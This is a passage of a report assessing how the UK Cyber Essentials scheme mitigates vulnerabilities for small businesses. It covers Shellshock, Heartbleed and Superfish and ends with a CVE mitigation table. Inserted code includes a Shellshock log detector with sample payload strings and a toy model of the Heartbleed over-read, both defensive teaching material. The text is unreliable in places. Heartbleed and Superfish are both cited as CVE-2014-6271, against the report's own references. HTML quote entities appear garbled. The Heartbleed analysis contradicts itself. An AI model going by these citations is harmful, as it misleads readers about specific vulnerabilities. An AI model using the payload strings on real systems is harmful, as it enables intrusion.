Existing Security Measures: Beyond the router's separation between the guest and office networks, no other network security measures are in place. The office PCs do have automatic patch installation configured, however, and have the Kaspersky antivirus suite installed.

Mitigation of applicable vulnerabilities: Of the 200 listed vulnerabilities, 103 were applicable to the fourth SME network.

Figure 12: SME-4 Vulnerability Mitigation

Similarly to SME 1, SME 4 requires the use of web browsers for bookings and reception of guests, so enables a wide variety of attack vectors through the web.

Thankfully, the services and servers they connect to are run by larger corporations, which will hopefully have implemented at least Cyber Essentials-grade security and protection, so the actual risks should be minimal.

For the purposes of this report, however, we assume that if this company has not implemented Cyber Essentials then the services they use must also not have, leaving them open to attack.
Survey Responses
Data gathered from survey responses affords a much broader look at the typical network deployments and practice in SMEs. The full results from 17 participants may be found in the Survey Responses section on page 27.

Physical Infrastructure: The majority of respondents belong to SMEs with 0-9 workstations on site; this is related to the size of an organisation, and could be considered representative of businesses across the UK.

Services: Local - File, Email, Database and Domain servers are the most common local service providers, all present in more than a third of SMEs. Remote - Email, web hosting and file-sharing are the most common services provided remotely.

User Access: More than half of SMEs permit employees' own devices to be used in the workplace; for organisations such as these it is important to ensure that employee machines receive the same level of protection as the rest of the work network, as one vulnerable machine allows vulnerability into the whole company.

Existing Security Measures: Of the survey respondents, most SMEs have a firewall, password policy and data-loss prevention scheme in place. These are the most common security measures in place for the SMEs contacted; below this is access control, malware protection and finally patch management, which is present in a little over half of organisations.

Almost two-thirds of survey participants were previously aware of Cyber Essentials.
Survey Respondents Network
The network built from Survey Respondents' data considers the overall response in order to build a network easily adaptable to match the majority of SME network configurations.

Locally, Email and File servers have been represented, with domain controller capabilities represented in a network ADSL router. Remotely, a web server is depicted, but remote services may also include database usage, email and other web services.
Figure 13: Adaptable Survey-Response Network
Typicality of Case-Study SMEs
Within the Survey Respondents' network, aspects of each of the interviewed SME networks are apparent.

The Finance SME network shares a local file server, as sensitive information needs to be kept and processed by the organisation. Any SME handling sensitive information will be likely to strongly consider using local file servers.

The Specialist SME shares with the survey respondents' data its use of SSH to connect remotely to services. SSH is an important tool for accessing sensitive data while at home, or data that is stored remotely from the workplace.

The Web Development SME requires employees to connect to many web servers remotely; the survey respondents match this case with the use of external web-hosting services. That being said, in the general case this server is more likely to be the SME's own web-hosting solution rather than a client's.

The Hotel Services SME represents a very basic local network, using only cloud-based services remotely. This is becoming an increasingly popular trend for SMEs, as cloud services are often easier to set up and cheaper to maintain. This is also representative of many SMEs with little-to-no online presence.
Analysis of Cyber Essentials on High Profile Vulnerabilities

The following sections detail three of the high-profile vulnerabilities to hit the popular media in late 2014 to early 2015. These are of particular note as, while they may not be the most damaging of attack vectors (although some are very serious), they have caught the attention of the public, and SMEs would be under pressure to ensure that they were protected.

With this in mind, we analyse how effective the Cyber Essentials security controls are at tackling these high-profile vulnerabilities.

"ShellShock"

Also known by the name "BashDoor", Shellshock hit the news as it attacked the Linux server environment, and did so in a particularly effective manner.
GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting the environment occurs across a privilege boundary from Bash execution, aka "ShellShock". NOTE: the original fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is still present after the incorrect fix.
CVE-2014-6271 [13]
The exploit allowed attackers to directly execute arbitrary shell commands on a compromised system by altering environment variables. However, the bug was not enough by itself to actually enable attackers to compromise a system, but allowed access via other services. While the exploit is only effective if the bash environment can be altered, the results can be devastating, as it lays bare the entire system to many other forms of attack.

The threat was particularly insidious for SMEs who used Linux/Unix-based servers for services (mail servers, as an example), as they would potentially have no idea that they had been compromised.
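Because the mod_cgi vector turns request headers into environment variables, a Shellshock attempt leaves its function-definition prefix in the web server's access log, which gives an SME a way to look for the compromise the report says they might otherwise miss. The following detector is an added example (not part of the report); the log lines are constructed in Apache "combined" format and the 192.0.2.0/24 addresses are documentation addresses.

```python
"""
Detection of Shellshock-style probes (CVE-2014-6271) in Apache access logs.

Vulnerable bash parsed an environment variable whose value began with a
function definition, "() {", and ran whatever trailed it. Via mod_cgi the
User-Agent and Referer headers become environment variables, so an attempt
shows up in the access log as a header value containing "() {". Both the raw
and the URL-decoded form of each field are checked.
"""
import re
from typing import List, Tuple
from urllib.parse import unquote

# Apache "combined" log format: host ident user [time] "request" status size "referer" "agent"
COMBINED = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)
# The function-definition prefix that vulnerable bash would act on.
SHELLSHOCK = re.compile(r"\(\)\s*\{")


def is_shellshock_value(value: str) -> bool:
    """True if the raw or URL-decoded value carries the "() {" trigger."""
    return bool(SHELLSHOCK.search(value) or SHELLSHOCK.search(unquote(value)))


def find_shellshock_attempts(lines: List[str]) -> List[Tuple[int, str, str]]:
    """Return (line_number, field, source_host) for every suspicious header field."""
    hits = []
    for n, line in enumerate(lines, start=1):
        m = COMBINED.match(line.strip())
        if not m:
            continue  # unparseable line: skip it rather than abort the scan
        for field in ("agent", "referer", "request"):
            if is_shellshock_value(m.group(field)):
                hits.append((n, field, m.group("host")))
    return hits


# Constructed sample lines, not from a real server. Line 2 carries the trigger
# in User-Agent, line 3 carries it URL-encoded in the Referer; line 4 is a
# benign agent string with a stray "{" that must not be flagged.
SAMPLE_LOG = [
    '192.0.2.10 - - [25/Sep/2014:10:01:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '192.0.2.77 - - [25/Sep/2014:10:01:09 +0000] "GET /cgi-bin/status HTTP/1.1" 200 64 "-" "() { :;}; echo CONSTRUCTED"',
    '192.0.2.78 - - [25/Sep/2014:10:02:30 +0000] "GET /cgi-bin/status HTTP/1.1" 500 0 "%28%29%20%7B%20%3A%3B%7D%3B%20echo%20x" "curl/7.38.0"',
    '192.0.2.11 - - [25/Sep/2014:10:03:00 +0000] "GET /about.html HTTP/1.1" 200 300 "http://example.com/" "Mozilla/5.0 (X11; Linux) {}"',
]

if __name__ == "__main__":
    for line_no, field, host in find_shellshock_attempts(SAMPLE_LOG):
        print(f"line {line_no}: Shellshock pattern in {field} from {host}")
```

Run against a real access log by reading its lines into the list; a hit on a host that also serves CGI scripts is the point at which the patch status of bash on that server should be checked.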
ldquoHeartbleedrdquo
Appearing in April 2014, the CVE-2014-6271 (aka "Heartbleed") bug allowed attackers to directly read the active memory of a target machine through a buffer over-read. This then allowed attackers to access private credentials (or indeed anything else) in the RAM of the target.

As described in the original CVE report:

The (1) TLS and (2) DTLS implementations in OpenSSL 1.0.1 before 1.0.1g do not properly handle Heartbeat Extension packets, which allows remote attackers to obtain sensitive information from process memory via crafted packets that trigger a buffer over-read, as demonstrated by reading private keys, related to d1_both.c and t1_lib.c, aka the Heartbleed bug.
CVE-2014-6271 [12]
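The over-read the CVE text describes comes from trusting the payload length field inside the heartbeat message instead of the length of the record that actually arrived. The following toy model is an added example (not from the report or from OpenSSL): it places a short heartbeat request in a constructed byte buffer standing in for process memory, shows the unchecked copy returning the bytes that follow the record, and shows the length check that the 1.0.1g fix introduced discarding the same message.

```python
"""
Toy model of the OpenSSL Heartbeat over-read (Heartbleed) and its fix.

A TLS Heartbeat message is: 1 byte type, 2 byte payload_length,
payload_length bytes of payload, then at least 16 bytes of padding.
The vulnerable code copied payload_length bytes back to the peer without
checking that many bytes had been received, so it read past the record.
The fix compares the claimed length against the record actually received.
"""
import struct
from typing import Optional

HB_REQUEST = 1
HB_RESPONSE = 2
PADDING_LEN = 16


def build_heartbeat(payload: bytes, claimed_len: Optional[int] = None) -> bytes:
    """Build a heartbeat request; claimed_len lets a test construct a malformed one."""
    if claimed_len is None:
        claimed_len = len(payload)
    return struct.pack("!BH", HB_REQUEST, claimed_len) + payload + b"\x00" * PADDING_LEN


def heartbeat_unchecked(memory: bytes, offset: int, record_len: int) -> bytes:
    """VULNERABLE (pre-1.0.1g behaviour): echoes payload_length bytes from the
    payload start without checking that they lie inside the received record."""
    _hb_type, payload_len = struct.unpack_from("!BH", memory, offset)
    payload_start = offset + 3
    # record_len is never consulted here; that omission is the bug.
    leaked = memory[payload_start:payload_start + payload_len]
    return struct.pack("!BH", HB_RESPONSE, payload_len) + leaked + b"\x00" * PADDING_LEN


def heartbeat_checked(memory: bytes, offset: int, record_len: int) -> Optional[bytes]:
    """FIXED: discard the message unless type + length + payload + padding
    all fit inside the record that actually arrived (the 1.0.1g check)."""
    if record_len < 1 + 2 + PADDING_LEN:
        return None  # too short to even hold the header and padding
    _hb_type, payload_len = struct.unpack_from("!BH", memory, offset)
    if 1 + 2 + payload_len + PADDING_LEN > record_len:
        return None  # claimed payload does not fit: silently discard
    payload_start = offset + 3
    payload = memory[payload_start:payload_start + payload_len]
    return struct.pack("!BH", HB_RESPONSE, payload_len) + payload + b"\x00" * PADDING_LEN


def demo() -> dict:
    """Run the vulnerable and fixed handlers over constructed memory."""
    # Constructed stand-in for process memory: the record, then data the peer
    # must never see (a placeholder for keys or session cookies), then slack.
    secret = b"CONSTRUCTED_SECRET_NOT_REAL"
    record = build_heartbeat(b"ping", claimed_len=64)  # claims 64 bytes, sends 4
    memory = record + secret + b"\x00" * 64
    record_len = len(record)

    vulnerable = heartbeat_unchecked(memory, 0, record_len)
    fixed = heartbeat_checked(memory, 0, record_len)

    good_record = build_heartbeat(b"ping")  # honest length: must still be echoed
    echoed = heartbeat_checked(good_record, 0, len(good_record))

    return {
        "vulnerable_leaks_secret": secret in vulnerable,
        "fixed_discards": fixed is None,
        "fixed_echoes_good": echoed is not None and echoed[3:7] == b"ping",
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```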
As OpenSSL is a core part of many applications and services, in both the open and closed source world, this vulnerability had the potential to damage a huge number of systems. At the time of release, various sources (including, for example, Netcraft [15]) reported that up to 17% of trusted SSL-certified servers were vulnerable to the attack.

Depending on how the SME in question operates, the threat this particular CVE posed (and indeed still poses, with as-yet-to-be-updated servers still online with the vulnerability) is difficult to discern. Obviously the vulnerability is serious, but the ability of individual SMEs to detect and correct this flaw will vary greatly depending on the individual deployments.

Larger companies with their own Linux/Unix servers may have been able to deploy the patched OpenSSL version as soon as the patch was available, but smaller businesses, or those with more cloud-based services, may not have access to the software running on the servers they use and may be at the mercy of the respective operators to implement the fix. Because of this, patch management only partially remedies this vulnerability, and other protection methods from the Cyber Essentials guidelines, such as securing configurations or controlling access, will have unknown effects.

It is vulnerabilities such as this that pose the greatest threat to SME networks, as the methods to fix the issue are often outside the control of the company, potentially leaving them vulnerable far longer than one would expect.
ldquoSuperfishrdquo
The SDK for Komodia Redirector with SSL Digestor, as used in Lavasoft Ad-Aware Web Companion 1.1.885.1766 and Ad-Aware AdBlocker (alpha) 1.3.69.1, Qustodio for Windows, Atom Security, Inc. StaffCop 5.8, and other products, uses the same X.509 certificate private key for a root CA certificate across different customers' installations, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging knowledge of this key, as originally reported for Superfish VisualDiscovery on certain Lenovo Notebook laptop products.
CVE-2014-6271 [14]

This vulnerability is particularly interesting as the software causing the issue was effectively brokered by a trusted hardware vendor, namely Lenovo. Because the issue was part of the 'normal configuration' for the equipment, it remained undetected for a long time, and hints that there may be further breaches in security as yet undiscovered in both Lenovo's and other manufacturers' equipment.

The vector is through the SuperFish software essentially breaking the chain of trust for SSL certificates, by installing a self-signing certificate into the list of trusted certificates on the host machine. This allows an attacker to simply sign their own code via the same certificate, which itself can be easily gathered from any other machine running SuperFish, and they have full access to any SSL-secured connection from the target machine.

Thankfully, while the risks to users and SMEs were high, the fix is a simple one-time run of a removal tool provided by Lenovo themselves [11], and is mitigated fully through the Cyber Essentials patch management advice.
Threat Analysis
ShellShock: Without Cyber Essentials in place, SMEs 1 and 2 would be at risk from 'Shellshock', as they both operate Unix/Linux-based systems that would require patching to plug the security issue. The extent to which SMEs 3 and 4 are vulnerable to this issue is unclear, as their large dependency on outside service providers leaves them in a position where they are both unable to determine their vulnerability and additionally unable to remedy it.

With Cyber Essentials, SMEs 1 and 2 would be fully protected, and it is likely that SMEs 3 and 4 are also protected if the external providers also use Cyber Essentials or other security and patching schemes.

Heartbleed: The 'Heartbleed' bug is another vulnerability that, without Cyber Essentials guidelines being followed, would have laid companies' external-facing services open to malicious attackers.

In all cases, however, each SME can be fully protected with a combination of patch management, firewalling and application of access controls from the Cyber Essentials guidelines.

SuperFish: All of the SMEs we interviewed could be exceedingly vulnerable to the 'Superfish' issue without Cyber Essentials, as much of their operations revolve around SSL-encrypted communications. A break in the chain of trust for their certificates would allow an attacker to man-in-the-middle their communications.

Normal system updates would have failed to remedy the situation, as the fix provided by Lenovo consisted of a tool to be run in addition to the normal operating system patches. It is further debatable how effective Cyber Essentials patch management would have been in plugging this vulnerability, as it would require that the administrators be aware of the issue and know of the patch, rather than simply following 'normal' patching guidelines. Assuming that the persons responsible for the equipment are aware of the issue, however, then Cyber Essentials patch management fully mitigates this issue.
Conclusions

The Cyber Essentials Security Tools have been shown to mitigate, or to mitigate as soon as a patch is released, all vulnerabilities from remote attackers that do not exploit fundamentally insecure software or hardware. Of the two hundred vulnerabilities collected, eight exploits were not able to be resolved with the deployment of security patches; for vulnerabilities such as these the only mitigation available is simply not to install the compromised systems. To help prevent deployments being susceptible to attacks on faulty systems, it may be recommended that a blacklist of such items is composed for public reference.

Scope: It is important to consider that the scope of this study covers only internet-based, commodity-level attacks, and although the Cyber Essentials tools perform very well in mitigating these, they do not represent full security. There is an increasingly identified risk from insiders that also requires attention, not least malicious acts but also users unknowingly compromising security.

The SMEs interviewed represent organisations from a range of market sectors: web development and online presence, specialist scientific services, the hospitality industry and finance.
Additional Tools
The 10 Steps to Cyber Security [2] identifies additional security measures that support the Cyber Essentials Scheme well, delivering additional security through indirect measures such as User Education and Awareness, along with Network and Systems Monitoring. These additional measures would bolster cyber security by fortifying each employee of the SME with the necessary knowledge of safe practice, its importance and some basic technical understanding, just as they may be versed in environmental awareness. Network and Systems Monitoring allows remote user logins, as well as file access and activity, to be logged. For very small networks this may currently be infeasible, as the extra manpower or finances required for such a system are costly. However, for larger organisations additional monitoring capability should be explored as a future extension to Cyber Essentials, not just to identify and mitigate malicious action from more bespoke and sophisticated attacks than those reported on, but also to aid in providing evidence for any potential cyber-crime investigations.

There exist some collective approaches to improving cyber-security; a notable example of this is the Cyber-security Information Sharing Partnership (CiSP) [4]. The partnership aims to benefit all members by providing real-time updates on issues of cyber-security and discovered vulnerabilities, as well as best-practice guides and other cyber-threat information. It would be beneficial for more organisations to belong to cyber-security collectives like this, creating networks of informed individuals working together to tackle cyber-crime. This would be particularly useful to quickly identify potential vulnerabilities and possible patches, which, as shown in this report, is critical for the CE patch management security control to fully mitigate related vulnerabilities.

An important note to be made is toward the security of business affiliates and service providers. Even if an SME has Cyber Essentials in place, any use of cloud services relies on the vendor's security controls for threat mitigation. In other words, cloud email, accounting and any other cloud-based or remote services are only as secure as the service provider makes them. In general, cloud providers should hold their security practice to a high level of scrutiny and should be encouraged to certify their protection. Hewlett-Packard (HP) has taken this further and has begun to strengthen its entire supply chain (600 SMEs) with the Cyber Essentials accreditation. This provides protection across the entirety of Hewlett-Packard's operations as well as its affiliates. This should be a goal for organisations of all sizes, minimising the risk from cyber-threats by ensuring all trading partners uphold the same high levels of security.
Cyber Essentials Controls
Of the five current Cyber Essentials Controls, Patch Management was considered to aid in the mitigation of the highest proportion of remote attacks (87.5%); counter-intuitively, the survey responses had patch management ranked last in use among SMEs. The controls most used currently could be seen as those providing the most intuitive or easily understood protection: data loss prevention, strong passwords and firewalls. Patch management, by contrast, isn't necessarily understood by individuals as a tool that greatly improves cyber-security.

Anti-Malware was useful in mitigating the fewest (10%) vulnerabilities. It is, however, important to note that Anti-Malware is largely the only security tool that routinely scans network hardware and software, as well as any items downloaded from the internet or received as email attachments. This serves as a last line of defence and as such is vital to an organisation's cyber-safety.
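The per-control figures quoted above can be checked against the Cyber Controls Applicability table in the appendix, whose With CE column names the measures behind each verdict. The following added example (not the report's own analysis code) parses rows in that table's layout, maps each named measure onto one of the five Cyber Essentials controls and tallies coverage and outcomes; the eight sample rows are transcribed from the table, so the proportions it prints describe that subset only, and the keyword-to-control mapping is an assumption of this example.

```python
"""Tally Cyber Essentials control coverage from rows of the report's
Cyber Controls Applicability table (added example, not the report's code)."""
import re
from collections import Counter

# Constructed sample: eight rows transcribed from the appendix table, in the
# layout  CVE | SME1 SME2 SME3 SME4 Idealised | No CE | With CE.
SAMPLE_ROWS = """
CVE-2013-0008 | y y y y y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y n y y n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1140 | n n n n n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2014-0160 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2014-4114 | y y y y n | Not Mitigated | Mitigated - Anti-Malware
CVE-2014-1477 | y y y y y | Not Mitigated | Mitigated - Firewall & Patch Management
CVE-2014-2103 | n n n n n | Not Mitigated | Mitigated - Firewall Anti DOS
"""

NETWORKS = ("SME1", "SME2", "SME3", "SME4", "Idealised")

ROW_RE = re.compile(
    r"^(CVE-\d{4}-\d+)\s*\|\s*([yn](?:\s+[yn]){4})\s*\|\s*([^|]+?)\s*\|\s*(.+?)\s*$")
OUTCOME_RE = re.compile(r"^(Not Mitigated|Partially Mitigated|Mitigated)\s*-\s*(.*)$")


def classify(measure):
    """Map one measure named in the table onto a Cyber Essentials control.
    The keyword mapping is this example's assumption: the table uses several
    labels (Anti-Malware / Malware Protection, Strong Passwords / User Access /
    Access Policy) for the same control, and measures outside the five
    controls (Website Blacklisting, Firmware Management, SSL) count as Other."""
    m = measure.lower()
    if "patch" in m:
        return "Patch Management"
    if "firewall" in m:
        return "Boundary Firewalls"
    if "configuration" in m:
        return "Secure Configuration"
    if "malware" in m:
        return "Malware Protection"
    if "password" in m or "access" in m:
        return "Access Control"
    return "Other"


def split_measures(text):
    """Turn 'Firewall, Secure Configuration (User Policy), Anti-Malware' into a
    sorted list of controls. Parenthetical and bracketed qualifiers are dropped
    first, so an '&' inside '(Secure Browser & Web Hosting)' is not a separator."""
    text = re.sub(r"\([^)]*\)|\[[^\]]*\]", "", text)
    return sorted({classify(t) for t in re.split(r"[,&]", text) if t.strip()})


def parse_rows(text):
    """Parse pipe-separated table rows; raise on any row that does not fit."""
    rows = []
    for line in text.strip().splitlines():
        m = ROW_RE.match(line.strip())
        if not m:
            raise ValueError(f"unparseable row: {line!r}")
        cve, flags, no_ce, with_ce = m.groups()
        om = OUTCOME_RE.match(with_ce)
        if not om:
            raise ValueError(f"unparseable outcome: {with_ce!r}")
        rows.append({
            "cve": cve,
            # y/n applicability flag per network, in column order
            "applicable": dict(zip(NETWORKS, (f == "y" for f in flags.split()))),
            "no_ce": no_ce,
            "with_ce": om.group(1),
            "controls": split_measures(om.group(2)),
        })
    return rows


def control_coverage(rows):
    """Fraction of rows whose With CE verdict relies on each control."""
    counts = Counter(c for r in rows for c in r["controls"])
    return {c: n / len(rows) for c, n in counts.items()}


def outcome_summary(rows):
    """Rows ending Mitigated / Partially Mitigated / Not Mitigated with CE in place."""
    return Counter(r["with_ce"] for r in rows)


def applicability(rows):
    """Per network, how many of the sampled CVEs applied to it."""
    return {n: sum(r["applicable"][n] for r in rows) for n in NETWORKS}


if __name__ == "__main__":
    rows = parse_rows(SAMPLE_ROWS)
    for control, share in sorted(control_coverage(rows).items(), key=lambda kv: -kv[1]):
        print(f"{control:22s} {share:6.1%}")
    print(outcome_summary(rows))
    print(applicability(rows))
```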
Recommendations
To further improve cyber-security across the UK, we recommend that:

1. Collective approaches to cyber security should be further encouraged. In particular, a governmental or collective approach to identifying inherently flawed products should be developed. This could be in addition to, or as an extension to, current initiatives like CiSP, which can make a difference in detecting and reacting to potential vulnerabilities in a timely manner.

2. Further research into the mitigation of other cyber-threats is carried out to explore the risk from insider threats and targeted attacks.

3. Further employee education is strongly encouraged, especially to be able to tackle the other types of attacks mentioned above, which were not within the scope of this report.
References

[1] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation and Skills. Cyber security guidance for business. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[2] Centre for the Protection of National Infrastructure, CESG, Cabinet Office, Department for Business, Innovation & Skills. 10 steps to cyber security. https://www.gov.uk/government/publications/cyber-risk-management-a-board-level-responsibility, September 2012.

[3] CESG, UK Trade & Investment, Prime Minister's Office, 10 Downing Street, Centre for the Protection of National Infrastructure, Government Communications Headquarters, Department for Business, Innovation and Skills. Cyber security boost for UK firms. https://www.gov.uk/government/news/cyber-security-boost-for-uk-firms, January 2015.

[4] Centre for the Protection of National Infrastructure, CiSP, CERT-UK, Department for Business, Innovation & Skills. Cyber-security information sharing partnership (CiSP). https://www.cert.gov.uk/cisp/, March 2013.

[5] CREST. Cyber essentials certified companies. http://www.cyberessentials.org/list/, March 2015.

[6] CVE.Mitre.org. Terminology - mitre.org. http://cve.mitre.org/about/terminology.html.

[7] Cyber Essentials. Cyber essentials scheme - overview. https://www.gov.uk/government/publications/cyber-essentials-scheme-overview.

[8] CESG, Cabinet Office, Centre for the Protection of National Infrastructure, Department for Business, Innovation & Skills. Common cyber attacks: Reducing the impact. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400106/Common_Cyber_Attacks-Reducing_The_Impact.pdf, January 2015.

[9] UK Cyber Security Forum. North west cyber security cluster. http://www.ukcybersecurityforum.com/index.php/cyber-security-clusters/north-west-‘-cluster, 2015.

[10] HM Government. Cyber essentials certified companies. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/400914/bis-15-72-cyber-essentials-scheme-assurance-framework.pdf, January 2015.

[11] Lenovo. Superfish uninstall instructions. http://support.lenovo.com/us/en/product_security/superfish_uninstall.

[12] Mitre.org. CVE-2014-0160 aka Heartbleed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160, 2014.

[13] Mitre.org. CVE-2014-6271 aka Shellshock. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271, 2014.

[14] Mitre.org. CVE-2015-2077 aka Superfish. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2077, 2015.

[15] Netcraft. Half a million widely trusted websites vulnerable to Heartbleed bug. http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html, April 2014.

[16] Cabinet Office. The UK cyber security strategy - protecting and promoting the UK in a digital world. https://www.gov.uk/government/uploads/system/uploads/attachment_data/file/60961/uk-cyber-security-strategy-final.pdf, November 2011.

[17] Cabinet Office and The Rt Hon Francis Maude MP. Government mandates new cyber security standard for suppliers. https://www.gov.uk/government/news/government-mandates-new-cyber-security-standard-for-suppliers, September 2014.
Cyber Controls Applicability

CVE | SME1 SME2 SME3 SME4 Idealised | No CE | With CE
CVE-2013-0008 | y y y y y | Not Mitigated | Mitigated - Firewall, Secure Configuration (User Policy), Anti-Malware
CVE-2013-0022 | y n y y n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0084 | y y y n y | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0140 | y n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0149 | n n n n n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-0172 | y n n n n | Not Mitigated | Mitigated - User Access (Strong Password), Patch Management
CVE-2013-0174 | n n n n n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall, Patch Management
CVE-2013-0199 | y n n n n | Not Mitigated | Mitigated - Patch Management & Secure Configuration
CVE-2013-0253 | n n y n n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Server)
CVE-2013-0270 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0481 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0598 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0619 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0633 | y y y y y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Firmware Management
CVE-2013-0649 | y y y y y | Not Mitigated | Mitigated - Firewall, Secure Configuration (Secure Browsing), Patch Management
CVE-2013-0746 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-0753 | y y y y y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-0787 | y y y y n | Not Mitigated | Mitigated - Patch Management
CVE-2013-0909 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1035 | y y y y n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1102 | n n n n n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1140 | n n n n n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-1144 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1153 | y n n n n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1181 | n n n n n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-1303 | y n y y n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-1384 | y y y y n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Secure Browser)
CVE-2013-1388 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration
CVE-2013-1450 | y n y y n | Not Mitigated | Mitigated - Secure Configuration, Patch Management
CVE-2013-1472 | y y y y n | Not Mitigated | Partially Mitigated - Patch Management, Secure Configuration (Access Policy)
CVE-2013-1553 | y n y y n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1620 | y y y y n | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-1627 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1638 | y y y y n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1669 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1676 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1700 | y y y y y | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management, Anti-Malware
CVE-2013-1734 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-1777 | n n y n n | Not Mitigated | Mitigated - Firewall, Patch Management
CVE-2013-2319 | n n n n n | Not Mitigated | Mitigated - Patch Management, Firewall, Secure Configuration (Secure Browser)
CVE-2013-2340 | n n n n n | Not Mitigated | Not Mitigated - Secure Configuration (Don't install)
CVE-2013-2350 | n y n n y | Not Mitigated | Partially Mitigated - Patch Management & Firewall
CVE-2013-2492 | y n y n n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2507 | y n n n n | Not Mitigated | Partially Mitigated - Firmware Management, Anti-Malware
CVE-2013-2736 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-2780 | n n n n n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2803 | n n n n n | Not Mitigated | Mitigated - Strong Passwords, Patch Management
CVE-2013-2824 | n n n n n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2826 | n n n n n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-2920 | n y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3064 | y n n n n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3116 | y n y y n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3137 | y y y y n | Not Mitigated | Mitigated - Anti-Malware, Secure Configuration (Don't Install)
CVE-2013-3194 | y n y y n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3199 | y n y y y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3201 | y n y y y | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3206 | y n y y n | Not Mitigated | Mitigated - Patch Management, Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3280 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management & Secure Configuration
CVE-2013-3387 | n n n n n | Not Mitigated | Mitigated - Firewall, Secure Configuration, Patch Management
CVE-2013-3417 | n n n n n | Not Mitigated | Mitigated - Secure Configuration (Secure Browser), Website Blacklisting
CVE-2013-3632 | y y y n n | Not Mitigated | Mitigated - Access Policy (Strong Password), Firewall
CVE-2013-3656 | n n n n n | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3856 | y y y y y | Not Mitigated | Mitigated - Patch Management, Firewall, Anti-Malware
CVE-2013-3860 | y y y y y | Not Mitigated | Partially Mitigated - Patch Management
CVE-2013-3893 | y n y y n | Not Mitigated | Mitigated - Patch Management, Secure Configuration - no JS
